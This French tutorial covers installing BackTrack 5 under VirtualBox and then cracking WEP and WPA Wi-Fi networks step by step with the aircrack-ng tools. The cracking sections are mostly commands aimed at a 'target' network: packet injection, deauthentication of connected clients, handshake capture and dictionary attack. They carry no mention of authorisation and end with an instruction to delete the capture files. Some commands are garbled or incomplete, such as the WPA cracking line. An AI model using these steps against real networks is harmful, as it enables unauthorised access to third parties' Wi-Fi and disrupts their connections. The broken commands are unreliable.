Compatibilité matérielle avec BackTrack

Pour savoir si votre carte/clé Wifi est compatible avec BackTrack 5, si elle est

compatible mode moniteur et injection et comment l’installer si besoin, visiter ce

lien :

http://wiki.backtrack-fr.net/index.php/Compatibilit%C3%A9_Mat%C3%A9rielle

Installation et configuration de Backtrack 5 sous VirtualBox I/ Téléchargement -Télécharger la dernière version de VirtualBox depuis cette page http://www.virtualbox.org/wiki/Downloads

- Télécharger l’ISO de Backtrack 5 depuis ce lien http://www.backtrack-linux.org/downloads/ Choisir la version GNOME 64bit de préférence (le mode de téléchargement importe peu).

II/ Configuration de VirtualBox - Installer normalement VirtualBox sur votre ordinateur - Lancer VirtualBox et lancer la création d’une nouvelle machine virtuelle avec le bouton Créer

- Cliquer sur Suivant - Entrer le nom de la machine virtuelle (Backtrack 5, par exemple)

- Système d’exploitation : Linux - Version : Ubuntu (64bit)

- Cliquer sur Suivant

- Assigner à la machine virtuelle environ 30% de la RAM de votre ordinateur.

- Cliquer sur Suivant - Cocher Disque dur d’amorçage - Sélectionner Créer un nouveau disque dur

- Cliquer sur Suivant - Cliquer sur Suivant

- Sélectionner Fichier de taille variable (C’est le meilleur choix si vous ne voulez pas attendre ou que vous êtes limités sur votre disque dur) - Cliquer sur Suivant - Faites glisser le curseur pour régler la taille maximale du disque virtuel (Je conseille 20Go au minimum si vous voulez pouvoir y travailler un minimum) - Cliquer sur Suivant - Cliquer sur Terminer

Vous devriez avoir quelque chose qui ressemble à ceci :

- Cliquer sur Terminer Note : Nous travaillerons sur la machine nommée BT5-1

- Cliquer sur Configuration - Aller dans Stockage

- Cliquer sur l’icône en forme de disque avec un + - Sélectionner Ajouter un lecteur CD/DVD

- Cliquer sur Choisir un disque

- Sélectionner l’ISO de Backtrack 5 que vous avez téléchargé - Aller dans Affichage - Régler la Mémoire Vidéo à 64Mo minimum

- Cliquer sur OK

III/Installation de Backtrack 5

- Cliquer sur Démarrer pour lancer la machine virtuelle - Au tout début appuyer sur Entrée si la machine n’évolue pas - Sélectionner BackTrack Text

- Quand une console apparaît, taper :

root@root:~# stqrtx

Note : Il faut normalement taper startx mais le clavier est par défaut en Qwerty - Lancer l’installation de BackTrack par l’icône sur le bureau

Attention : Il faut être conencté à internet pour finaliser l’installation

- Sélectionner la langue (ici Français), le fuseau horaire (ici, France) - Laisser le clavier sur Option suggérée s’il est bien configuré (on peut tester le clavier dans la zone en bas de la fenètre)

- Pour l’étape 4 ne rien toucher et cliquer sur Suivant - Cliquer sur Installer et patienter le temps de l’installation

Note : Il se peut que l’installation reste un peu bloquée à 99%, c’est normal, le système télécharge et installe des fichiers depuis internet

- Une fois l’installation terminée, éteindre BackTrack 5 - Aller dans Configuration � Stockage

- Dans le menu déroulant Contrôleur IDE, sélectionner l’ISO de BackTrack 5 et sélectionner Supprimer le périphérique

- Démarrer BackTrack 5 (cf fichier Démarrer BT5) -Ouvrir une console (icône en haut, à gauche de System) - Téléchargeons VBox Guest Addon :

root@bt:~# wget http://download.virtualbox.org/virtualbox/4.0.8/VBo xGuestAdditions_4.0.8.iso

- Aller dans Places � Computer � File System - Créer un nouveau dossier (New Folder) nommé : a

- Installons VBox Guest Addon : root@bt:~# mount –o loop VBoxGuestAdditions_4.0.8.iso /a root@bt:~# cd /a root@bt:~# chmod a+x VBoxLinuxAdditions.run root@bt:~# ./VBoxLinuxAdditions.run

- Redémarrer

Ca y est, BackTrack 5 est opérationnel sous VirtualBox !

Démarrer BackTrack 5

Une fois que BackTrack a été installé la procédure pour les commandes pour le

démarrage sont les suivantes :

bt login : root

password : toor (le mot de passe ne s’affiche pas) root@bt:~# startx

Utiliser un périphérique USB pour Backtrack 5 sous

VirtualBox

Il est important de noter qu’un périphérique connecté à la machine virtuelle est

déconnecté de votre propre ordinateur.

Prenons l’exemple d’une clé USB que nous voulons connecter à BackTrack, pour y

placer une wordlist par exemple.

Ce tuto est aussi valable pour une clé USB-Wifi ou une mini antenne Wifi

connectée par USB.

- Connecter la clé USB à votre ordinateur

- Lancer VirtualBox et aller dans les Configurations de la machine cible

- Aller dans l’onglet USB

- Cliquer sur la prise USB avec un +

- Sélectionner le périphérique que vous voulez connecter à BackTrack

(Vérifier qu’il soit bien coché dans la liste Filtres Périphériques USB)

-Lancer BackTrack

Si le périphérique n’est pas accessible sous Backtrack :

- Cliquer sur Périphériques � Périphériques USB

- Vérifier si ledit périphérique est bien coché

- Si ce n’est pas le cas, le cliquer

Cracker un réseau Wifi WEP Ce tutorial nécessite une installation de Backtrack 5 ainsi qu’une carte/clé Wifi

correctement installé sous BackTrack 5 et compatible mode moniteur et injection (cf. Compatibilité matérielle).

Suivre les instructions suivantes :

Ouvrir une console root@bt:~# airmon-ng

Repérer le nom votre carte/clé wifi, ici

wlan0, nous allons démarrer le mode moniteur

root@bt:~# airmon-ng start wlan0

Notez que le mode moniteur est activé

sous mon0

root@bt:~# airodump-ng mon0

On suit l’évolution des réseaux wifi disponibles. Une fois que vous pensez que

vous avez tous les réseaux possibles (attendez 5-10s) appuyez sur Ctrl+C pour arrêter le processus.

Sélectionner le BSSID du réseau cible �

Clique droit � Copy Repérer le CHANNEL de la cible (entre 1 et 13)

root@bt:~# airodump-ng –w wep –c CHANNEL –b BSSID mon0

Le texte en vert est à remplacer par les

informations de la cible

Ouvrir un nouveau terminal

root@bt:~# aireplay-ng -1 0 –a BSSID mon0

Ouvrir un nouveau terminal

root@bt:~# aireplay-ng -3 –b BSSID mon0

Ouvrir un nouveau terminal

root@bt:~# dir

Nous vérifions la presence du fichier wep-

01.cap root@bt:~# aircrack-ng wep-01.cap

Pour lancer cette commande il faut avoir un nombre suffisant de Data (5000-10000) sur le réseau cible, laisser tout tourner jusqu’à ce que la clé soit trouvée (une clé WEP est composée de 10 caractères hexadécimaux de

la forme : xx:xx:xx:xx:xx). Sélectionner la cible si demandé.

Cela peut prendre de 3min à 1h, selon le trafic sur le réseau cible. Une fois que vous avez la clé, sauvegardez-là quelque part. Arrêter tous les processus et fermer les consoles.

Aller dans Places � Home Folder Supprimer tous les fichiers nommés wep-01 (quelque soit l’extension).

Cracker un réseau Wifi WPA

Ce tutorial nécessite une installation de Backtrack 5 ainsi qu’une carte/clé Wifi correctement installé sous BackTrack 5, compatible mode moniteur et injection (cf. Compatibilité matérielle) et une wordlist/dictionnaire préalablement copié sur le bureau,

de préférence de la langue de la cible (ici Français). Suivre les instructions suivantes :

Ouvrir une console root@bt:~# airmon-ng

Repérer le nom votre carte/clé wifi, ici wlan0, nous allons démarrer le mode moniteur

root@bt:~# airmon-ng start wlan0

Notez que le mode moniteur est activé

sous mon0

root@bt:~# airodump-ng mon0

On suit l’évolution des réseaux wifi disponibles. Une fois que vous pensez que

vous avez tous les réseaux possibles (attendez 5-10s) appuyez sur Ctrl+C pour

arrêter le processus. Noter le BSSID, le ESSID et le CHANNEL

de la cible. Noter aussi la STATION associée au BSSID cible.

Attention : Il est nécessaire d’avoir une STATION connectée pour réaliser la suite ! Sinon les deauth seront inefficaces

root@bt:~# airodump-ng –c CHANNEL –w wpa –b BSSID --ivs mon0

Le texte en vert est à remplacer par les informations de la cible

Ouvrir un nouveau terminal

Nous allons lancer une désauthentification à la cible afin d’obtenir le handshake, relancer cette commande plusieurs fois si

nécessaire. Si vous n’avez toujours pas de handshake, attendez qu’il y ait un minimum de trafic sur la cible.

3 commandes équivalentes sont alors possibles : root@bt:~# aireplay-ng -0 1 –e ESSID mon0 root@bt:~# aireplay-ng -0 1 –a BSSID mon0 root@bt:~# aireplay-ng -0 1 –a BSSID –c STATION mon0

Il est possible de remplacer le 1 par n’importe quel nombre ce qui changera le nombre de

désauthentification (attention 0 envoie des dehaut à l’infini –Ctrl+C pour arrêter-).

Une fois le handshake obtenu, vérifions la présence de wpa-01.ivs root@bt:~# dir

Nous allons maintenant laisser faire la wordlist (ou dictionnaire) root@bt:~# -w /root/Desktop/ NOMDUDICO wpa-01.ivs

Ici le dictionnaire se nomme wpalist.txt (ne pas oublier l’extension !)

Attendre que le dictionnaire ait trouvé la clé… Si le dictionnaire que vous avez utilisez n’a pas été efficace, essayez en un autre, etc…

Une fois la clé trouvée et notée, arrêter toutes les consoles et les fermer. Aller dans Places � Home Folder Supprimer tous les fichiers wpa-01.ivs